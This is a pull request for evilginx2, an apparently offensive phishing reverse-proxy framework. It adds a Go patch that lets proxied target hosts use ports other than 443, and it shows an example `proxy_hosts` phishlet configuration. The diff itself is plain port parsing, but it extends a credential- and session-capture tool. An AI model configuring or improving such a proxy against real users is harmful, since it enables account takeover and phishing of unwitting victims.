### PR TITLE
Added support to different ports than 443 for targets

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -1200,12 +1200,21 @@ func (p *HttpProxy) httpsWorker() {
 			}
 
 			hostname, _ = p.replaceHostWithOriginal(hostname)
+                        port := ""
+
+                        if strings.Contains(hostname, ":") {
+                                parts := strings.SplitN(hostname, ":", 2)
+                                hostname = parts[0]
+                                port = parts[1]
+                        } else {
+                                port = "443"
+                        }
 
 			req := &http.Request{
 				Method: "CONNECT",
 				URL: &url.URL{
 					Opaque: hostname,
-					Host:   net.JoinHostPort(hostname, "443"),
+					Host:   net.JoinHostPort(hostname, port),
 				},
 				Host:       hostname,
 				Header:     make(http.Header),


### PR DESCRIPTION
By default, evilginx2 always connect on port 443 for all domains under proxy_hosts.
With this patch, if the port is different than 443, you can provide a domain and port as domain under proxy_hosts.
It's a ugly patch, but it works. Please check the example below.

```
proxy_hosts:
  - {phish_sub: 'sub1', orig_sub: 'sub1', domain: 'example.com', session: true, is_landing: true}
  - {phish_sub: 'sub2', orig_sub: 'sub2', domain: 'anotherexample.com:443', session: true, is_landing: false}
```